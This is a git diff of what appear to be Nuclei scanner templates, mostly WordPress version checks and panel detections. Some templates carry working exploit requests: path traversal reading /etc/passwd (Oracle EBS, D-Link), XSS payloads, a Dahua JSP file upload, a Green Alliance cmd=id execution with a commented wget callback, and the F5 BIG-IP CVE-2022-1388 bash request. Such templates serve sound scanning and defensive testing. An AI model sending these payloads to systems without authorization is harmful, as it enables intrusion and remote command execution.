https://the-infosec.com" - severity: Critical + author: emenalf,tirtha_mandal,thomas_from_offensity + severity: critical + reference: + - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf + - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf + - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf + tags: oracle,lfi requests: - method: GET path: - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/" + - "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd" matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml b/poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml index c3ced8553c..44c22c100b 100644 --- a/poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml +++ b/poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml @@ -1,15 +1,17 @@ id: oracle-ebs-sqllog-disclosure + info: name: Oracle EBS SQL Log Disclosure author: dhiyaneshDk severity: medium - reference: - - https://the-infosec.com/2017/03/29/do-you-know-what-your-erp-is-telling-us/ tags: oracle,ebs,logs,exposure + reference: https://the-infosec.com/2017/03/29/do-you-know-what-your-erp-is-telling-us/ + requests: - method: GET path: - '{{BaseURL}}/OA_HTML/bin/sqlnet.log' + matchers-condition: and matchers: - type: word @@ -17,10 +19,12 @@ requests: - "DESCRIPTION=" - "USER=" part: body + - type: word words: - "text/plain" part: header + - type: status status: - 200 diff --git a/poc/oracle/oracle-ebs-xss-9373.yaml b/poc/oracle/oracle-ebs-xss-9373.yaml index c41cfe14d7..23bd3eea02 100644 --- a/poc/oracle/oracle-ebs-xss-9373.yaml +++ b/poc/oracle/oracle-ebs-xss-9373.yaml @@ -1,25 +1,29 @@ id: oracle-ebs-xss + info: - name: Oracle EBS XSS + name: Oracle EBS - Cross-Site Scripting author: dhiyaneshDk severity: medium - tags: oracle,xss,ebs - reference: | + reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf + tags: oracle,xss,ebs + requests: - method: GET path: - "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" + matchers-condition: and matchers: - type: word words: - "" part: body + - type: status status: - 200 diff --git a/poc/oracle/oracle-fatwire-lfi-9379.yaml b/poc/oracle/oracle-fatwire-lfi-9379.yaml index e014de6a11..6a3669ca0e 100644 --- a/poc/oracle/oracle-fatwire-lfi-9379.yaml +++ b/poc/oracle/oracle-fatwire-lfi-9379.yaml @@ -4,8 +4,7 @@ info: author: Bernardo Rodrigues @bernardofsr severity: critical description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint - reference: - - https://www.exploit-db.com/exploits/50167 + reference: https://www.exploit-db.com/exploits/50167 tags: lfi,oracle,fatwire requests: - method: GET diff --git a/poc/oracle/oracle-iplanet-web-server-9392.yaml b/poc/oracle/oracle-iplanet-web-server-9392.yaml index 8bd76eabb4..dcf6b13bc8 100644 --- a/poc/oracle/oracle-iplanet-web-server-9392.yaml +++ b/poc/oracle/oracle-iplanet-web-server-9392.yaml @@ -1,21 +1,26 @@ id: oracle-iplanet-web-server + info: name: Detect Oracle-iPlanet-Web-Server author: pussycat0x severity: info - metadata: - fofa-query: app="Oracle-iPlanet-Web-Server tags: tech,oracle + metadata: + fofa-query: 'app="Oracle-iPlanet-Web-Server' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word + part: body words: - "Oracle iPlanet Web Server" + - type: status status: - 200 diff --git a/poc/oracle/oracle-people-enterprise-9396.yaml b/poc/oracle/oracle-people-enterprise-9396.yaml index 8f732871c5..90f42929ea 100644 --- a/poc/oracle/oracle-people-enterprise-9396.yaml +++ b/poc/oracle/oracle-people-enterprise-9396.yaml @@ -4,7 +4,8 @@ info: name: Oracle Peoplesoft Enterprise author: dhiyaneshDk severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + metadata: + shodan-query: http.title:"Oracle Peoplesoft Enterprise" tags: oracle,login,panel requests: diff --git a/poc/oracle/oracle-people-sign-in-9399.yaml b/poc/oracle/oracle-people-sign-in-9399.yaml index ab3ec1ae87..418ab3b9ba 100644 --- a/poc/oracle/oracle-people-sign-in-9399.yaml +++ b/poc/oracle/oracle-people-sign-in-9399.yaml @@ -3,9 +3,9 @@ info: name: Oracle Peoplesoft Sign-in author: idealphase severity: info - tags: oracle,panel metadata: shodan-query: http.title:"Oracle PeopleSoft Sign-in" + tags: oracle,panel requests: - method: GET path: diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 78d89c1465..1af31ba824 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml @@ -1,29 +1,43 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" +http: + - raw: + - | + POST /publishing/publishing/material/file/video HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 804 + Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 + Accept-Encoding: gzip, deflate + Connection: close + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" -http: - - method: GET - path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + Test + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Submit" - matchers-condition: and + submit + --dd8f988919484abab3816881c55272a7-- + + req-condition: true matchers: - - type: word - part: body - words: - - "c4ca" + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "success")' + - 'contains(body_1, "path")' + condition: and - - type: status - status: - - 500 +# /publishingImg/VIDEO/230812152005170200.jsp diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index a8f9cbe173..b35ef84818 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml @@ -1,59 +1,49 @@ id: Green-Alliance info: - name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability + name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets + Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability metadata: - fofa-query: app="NSFOCUS-下一代防火墙" - hunter-query: web.title="用户认证 - NSFOCUS NF" - + fofa-query: body="'/needUsbkey.php?username='" + hunter-query: web.body="'/needUsbkey.php?username='" http: - - raw: - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 238 - Accept-Encoding: gzip, deflate - Connection: close - - --1d52ba2a11ad8a915eddab1a0e85acd9 - Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" - - lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; - --1d52ba2a11ad8a915eddab1a0e85acd9-- - - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 217 - Accept-Encoding: gzip, deflate - Connection: close - - --4803b59d015026999b45993b1245f0ef - Content-Disposition: form-data; name="file"; filename="compose.php" - - - --4803b59d015026999b45993b1245f0ef-- - - - | - GET /mail/include/header_main.php HTTP/1.1 - Host: {{Host}}:4433 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 - Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 + - method: GET + path: + - "{{BaseURL}}/webconf/Exec/index?cmd=id" + matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1, 'upload file success')" - - "status_code_2 == 200 && contains(body_2, 'upload file success')" - - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" - condition: and + - type: word + part: body + words: + - "200" + + - type: status + status: + - 200 + + +# http: +# - method: GET +# path: +# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" + +# attack: clusterbomb +# matchers-condition: or +# matchers: +# - type: word +# part: interactsh_protocol +# name: http +# words: +# - "http" + +# - type: word +# part: interactsh_protocol +# name: dns +# words: +# - "dns" diff --git a/poc/other/advanced-classifieds-and-directory-pro-df64bc77c98ca0ac84f6a64571bc3337.yaml b/poc/other/advanced-classifieds-and-directory-pro-df64bc77c98ca0ac84f6a64571bc3337.yaml new file mode 100644 index 0000000000..535f7383dd --- /dev/null +++ b/poc/other/advanced-classifieds-and-directory-pro-df64bc77c98ca0ac84f6a64571bc3337.yaml @@ -0,0 +1,59 @@ +id: advanced-classifieds-and-directory-pro-df64bc77c98ca0ac84f6a64571bc3337 + +info: + name: > + Advanced Classifieds & Directory Pro <= 3.1.3 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/98cb9fdd-d01d-4ad2-a617-6c0da702e8fd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/advanced-classifieds-and-directory-pro/" + google-query: inurl:"/wp-content/plugins/advanced-classifieds-and-directory-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,advanced-classifieds-and-directory-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-classifieds-and-directory-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-classifieds-and-directory-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.3') \ No newline at end of file diff --git a/poc/other/allow-cleartext-traffic.yaml b/poc/other/allow-cleartext-traffic.yaml new file mode 100644 index 0000000000..910f520129 --- /dev/null +++ b/poc/other/allow-cleartext-traffic.yaml @@ -0,0 +1,38 @@ +id: allow-cleartext-traffic + +info: + name: Allow Cleartext Traffic + author: YoruYagami + severity: medium + description: | + This template detects if cleartext traffic is allowed in the Android manifest file. Allowing cleartext traffic (HTTP) can expose sensitive data to network sniffing and man-in-the-middle attacks. It is recommended to enforce HTTPS to ensure data integrity and confidentiality. + remediation: | + To remediate this issue, set the `usesCleartextTraffic` and `cleartextTrafficPermitted` attributes to `false` in the application’s network security configuration. Example: + + ```xml + + ... + + ``` + + Example: + + ```xml + + + ... + + + ``` + +file: + - extensions: + - xml + + matchers: + - type: word + words: + - "android:usesCleartextTraffic=\"true\"" + - "cleartextTrafficPermitted=\"true\"" diff --git a/poc/other/bakes-and-cakes.yaml b/poc/other/bakes-and-cakes.yaml new file mode 100644 index 0000000000..328dbe7d1f --- /dev/null +++ b/poc/other/bakes-and-cakes.yaml @@ -0,0 +1,59 @@ +id: bakes-and-cakes + +info: + name: > + themedropbox Themes <= Various Versions - Missing Authorization to Notice Dismissal + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ba3c70a-967f-4dc9-aaac-d13b11eb4711?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/bakes-and-cakes/" + google-query: inurl:"/wp-content/themes/bakes-and-cakes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,bakes-and-cakes,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/bakes-and-cakes/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bakes-and-cakes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.6') \ No newline at end of file diff --git a/poc/other/bard.yaml b/poc/other/bard.yaml new file mode 100644 index 0000000000..7706465bcf --- /dev/null +++ b/poc/other/bard.yaml @@ -0,0 +1,59 @@ +id: bard + +info: + name: > + Bard <= 2.210 - Cross-Site Request Forgery to Notice Dismissal + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cec0ba0e-28a5-46c0-97c2-bbf73bd2dbad?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/bard/" + google-query: inurl:"/wp-content/themes/bard/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,bard,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/bard/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.210') \ No newline at end of file diff --git a/poc/other/bbpress-notify-nospam.yaml b/poc/other/bbpress-notify-nospam.yaml new file mode 100644 index 0000000000..cacf638488 --- /dev/null +++ b/poc/other/bbpress-notify-nospam.yaml @@ -0,0 +1,59 @@ +id: bbpress-notify-nospam + +info: + name: > + bbPress Notify <= 2.18.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9fc3355f-a3e3-4f30-885a-90d4982f699e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bbpress-notify-nospam/" + google-query: inurl:"/wp-content/plugins/bbpress-notify-nospam/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bbpress-notify-nospam,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bbpress-notify-nospam/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bbpress-notify-nospam" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.18.3') \ No newline at end of file diff --git a/poc/other/bigip.yaml b/poc/other/bigip.yaml index 62a06938bc..6557561b7e 100644 --- a/poc/other/bigip.yaml +++ b/poc/other/bigip.yaml @@ -1,57 +1,75 @@ id: CVE-2022-1388 + info: - name: F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter - author: Mrcl0wn + name: F5 BIG-IP iControl - REST Auth Bypass RCE + author: dwisiswant0,Ph33r severity: critical - description: "CVE-2022-1388 is an authentication bypass vulnerability in the REST \ncomponent of BIG-IP’s iControl API that was assigned a CVSSv3 \nscore of 9.8. The iControl REST API is used for the management and \nconfiguration of BIG-IP devices. CVE-2022-1388 could be exploited \nby an unauthenticated attacker with network access to the management \nport or self IP addresses of devices that use BIG-IP. Exploitation would \nallow the attacker to execute arbitrary system commands, create and \ndelete files and disable services.\n" + description: | + F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary code on the affected system. + remediation: | + Apply the necessary security patches or updates provided by F5 Networks to mitigate this vulnerability. reference: - - https://github.com/alt3kx/CVE-2022-1388_PoC + - https://twitter.com/GossiTheDog/status/1523566937414193153 + - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/ - https://support.f5.com/csp/article/K23605346 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 - - https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md - - https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py - - https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip - - https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml + - https://www.secpod.com/blog/critical-f5-big-ip-remote-code-execution-vulnerability-patch-now/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2022-1388 cwe-id: CWE-306 + epss-score: 0.97477 + epss-percentile: 0.99964 + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" verified: true - tags: bigip,mirai,rce,cve,cve2022 + max-request: 2 + vendor: f5 + product: big-ip_access_policy_manager + shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + tags: cve,cve2022,f5,bigip,rce,mirai,kev variables: - auth_var: "admin:" - cmd_var: "{{CMD}}" -requests: + auth: "admin:" + cmd: "echo CVE-2022-1388 | rev" + +http: - raw: - | POST /mgmt/tm/util/bash HTTP/1.1 Host: {{Hostname}} Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a - Authorization: Basic {{base64(auth_var)}} + Authorization: Basic {{base64(auth)}} Content-Type: application/json { - "command": "run", - "utilCmdArgs": "-c 'id;cmd_var'" + "command": "run", + "utilCmdArgs": "-c '{{cmd}}'" } - extractors: - - type: regex - part: body - name: result_command - group: 1 - regex: - - "\"commandResult\":\"(.*)\"" + - | + POST /mgmt/tm/util/bash HTTP/1.1 + Host: localhost + Connection: keep-alive, X-F5-Auth-Token + X-F5-Auth-Token: a + Authorization: Basic {{base64(auth)}} + Content-Type: application/json + + { + "command": "run", + "utilCmdArgs": "-c '{{cmd}}'" + } + + stop-at-first-match: true + + matchers-condition: and matchers: - type: word + part: body words: - "commandResult" - - "uid=" - - "{{cmd_var}}" - - type: status - status: - - 200 + - "8831-2202-EVC" condition: and +# digest: 4b0a00483046022100d97ef9b4f3d359a83d892ce6a3d915db764b3fcca6706bb11309bfa447f7cc48022100ded9e7b33da8f9cfc3f8a5ecaf6d8c822112cfa41ae02a3c16eec6124898a1a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/bookyourtravel-24e1da2302864651a8e364705c83abfb.yaml b/poc/other/bookyourtravel-24e1da2302864651a8e364705c83abfb.yaml new file mode 100644 index 0000000000..ea1cdbbd37 --- /dev/null +++ b/poc/other/bookyourtravel-24e1da2302864651a8e364705c83abfb.yaml @@ -0,0 +1,59 @@ +id: bookyourtravel-24e1da2302864651a8e364705c83abfb + +info: + name: > + Book Your Travel <= 8.18.17 - Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6677aa22-3248-41d5-a257-5330455d5bcc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/bookyourtravel/" + google-query: inurl:"/wp-content/themes/bookyourtravel/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,bookyourtravel,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/bookyourtravel/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bookyourtravel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.18.17') \ No newline at end of file diff --git a/poc/other/business-one-page.yaml b/poc/other/business-one-page.yaml new file mode 100644 index 0000000000..28609d79c4 --- /dev/null +++ b/poc/other/business-one-page.yaml @@ -0,0 +1,59 @@ +id: business-one-page + +info: + name: > + Business One Page <= 1.2.9 - Missing Authorization to Notice Dismissal + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f7be0fe9-3b6a-47e7-8a18-856b0e164f09?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/business-one-page/" + google-query: inurl:"/wp-content/themes/business-one-page/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,business-one-page,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/business-one-page/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "business-one-page" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.9') \ No newline at end of file diff --git a/poc/other/construction-landing-page.yaml b/poc/other/construction-landing-page.yaml new file mode 100644 index 0000000000..cbd901d536 --- /dev/null +++ b/poc/other/construction-landing-page.yaml @@ -0,0 +1,59 @@ +id: construction-landing-page + +info: + name: > + themedropbox Themes <= Various Versions - Missing Authorization to Notice Dismissal + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ba3c70a-967f-4dc9-aaac-d13b11eb4711?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/construction-landing-page/" + google-query: inurl:"/wp-content/themes/construction-landing-page/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,construction-landing-page,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/construction-landing-page/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "construction-landing-page" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.5') \ No newline at end of file diff --git a/poc/other/d-link-arbitary-fileread-7046.yaml b/poc/other/d-link-arbitary-fileread-7046.yaml index 8c055aea9f..4fa58abfa6 100644 --- a/poc/other/d-link-arbitary-fileread-7046.yaml +++ b/poc/other/d-link-arbitary-fileread-7046.yaml @@ -1,26 +1,21 @@ id: dlink-file-read - info: name: D-Link Arbitrary File Read author: dhiyaneshDK severity: high reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html tags: dlink,lfi - requests: - method: POST path: - "{{BaseURL}}/cgi-bin/webproc" body: 'errorpage=/etc/passwd&obj-action=auth&:action=login' - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:[x*]:0:0" part: body - - type: status status: - 200 diff --git a/poc/other/dead-host-with-cname-6787.yaml b/poc/other/dead-host-with-cname-6787.yaml index 774edabe3b..b770519f5e 100644 --- a/poc/other/dead-host-with-cname-6787.yaml +++ b/poc/other/dead-host-with-cname-6787.yaml @@ -4,6 +4,7 @@ info: name: dead-host-with-cname author: pdnuclei - projectdiscovery.io severity: info + tags: dns dns: - name: "{{FQDN}}" diff --git a/poc/other/dead-host-with-cname.yaml b/poc/other/dead-host-with-cname.yaml index ea1b691f9f..774edabe3b 100644 --- a/poc/other/dead-host-with-cname.yaml +++ b/poc/other/dead-host-with-cname.yaml @@ -1,9 +1,10 @@ id: dead-host-with-cname + info: - name: Detect Dangling cnames - author: pdteam,nytr0gen + name: dead-host-with-cname + author: pdnuclei - projectdiscovery.io severity: info - tags: dns + dns: - name: "{{FQDN}}" type: A @@ -15,11 +16,7 @@ dns: - type: word words: - "NXDOMAIN" + - type: word words: - "IN\tCNAME" - extractors: - - type: regex - group: 1 - regex: - - "IN\tCNAME\t(.+)" diff --git a/poc/other/defectdojo-panel-6916.yaml b/poc/other/defectdojo-panel-6916.yaml index 967457ff53..7c5373f611 100644 --- a/poc/other/defectdojo-panel-6916.yaml +++ b/poc/other/defectdojo-panel-6916.yaml @@ -1,18 +1,15 @@ id: defectdojo-panel - info: name: DefectDojo Exposure author: Adam Crosser severity: info - tags: panel,defectdojo metadata: - shodan-query: 'html:"DefectDojo Logo"' - + shodan-query: html:"DefectDojo Logo" + tags: panel,defectdojo requests: - method: GET path: - '{{BaseURL}}/login?next=' - matchers: - type: word words: diff --git a/poc/other/deprecated-tls-6959.yaml b/poc/other/deprecated-tls-6959.yaml index bfcd9696da..f2d4a388e6 100644 --- a/poc/other/deprecated-tls-6959.yaml +++ b/poc/other/deprecated-tls-6959.yaml @@ -1,10 +1,15 @@ id: deprecated-tls info: - name: Deprecated TLS Detection (inferior to TLS 1.2) + name: Deprecated TLS Detection (TLS 1.1 or SSLv3) author: righettod severity: info - reference: https://ssl-config.mozilla.org/#config=intermediate + reference: + - https://ssl-config.mozilla.org/#config=intermediate + description: | + Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. + remediation: | + Update the web server's TLS configuration to disable TLS 1.1 and SSLv3. metadata: shodan-query: ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1 tags: ssl diff --git a/poc/other/dir-listing-7006.yaml b/poc/other/dir-listing-7006.yaml index 87c7b818a0..5192b48644 100644 --- a/poc/other/dir-listing-7006.yaml +++ b/poc/other/dir-listing-7006.yaml @@ -1,16 +1,20 @@ id: dir-listing - info: name: Directory listing enabled - author: _harleo + author: _harleo,pentest_swissky severity: info - + reference: + - https://portswigger.net/kb/issues/00600100_directory-listing + tags: misc,generic requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers: - type: word words: + - "Directory listing for" - "Index of /" - "[To Parent Directory]" + - "Directory: /" + condition: or diff --git a/poc/other/ditty-news-ticker-b4a4bcce8fa22e53188748971336f218.yaml b/poc/other/ditty-news-ticker-b4a4bcce8fa22e53188748971336f218.yaml new file mode 100644 index 0000000000..ee6bdfb761 --- /dev/null +++ b/poc/other/ditty-news-ticker-b4a4bcce8fa22e53188748971336f218.yaml @@ -0,0 +1,59 @@ +id: ditty-news-ticker-b4a4bcce8fa22e53188748971336f218 + +info: + name: > + Ditty – Responsive News Tickers, Sliders, and Lists <= 3.1.42 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c1ba314e-0c7a-408a-9565-89989b22de44?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ditty-news-ticker/" + google-query: inurl:"/wp-content/plugins/ditty-news-ticker/" + shodan-query: 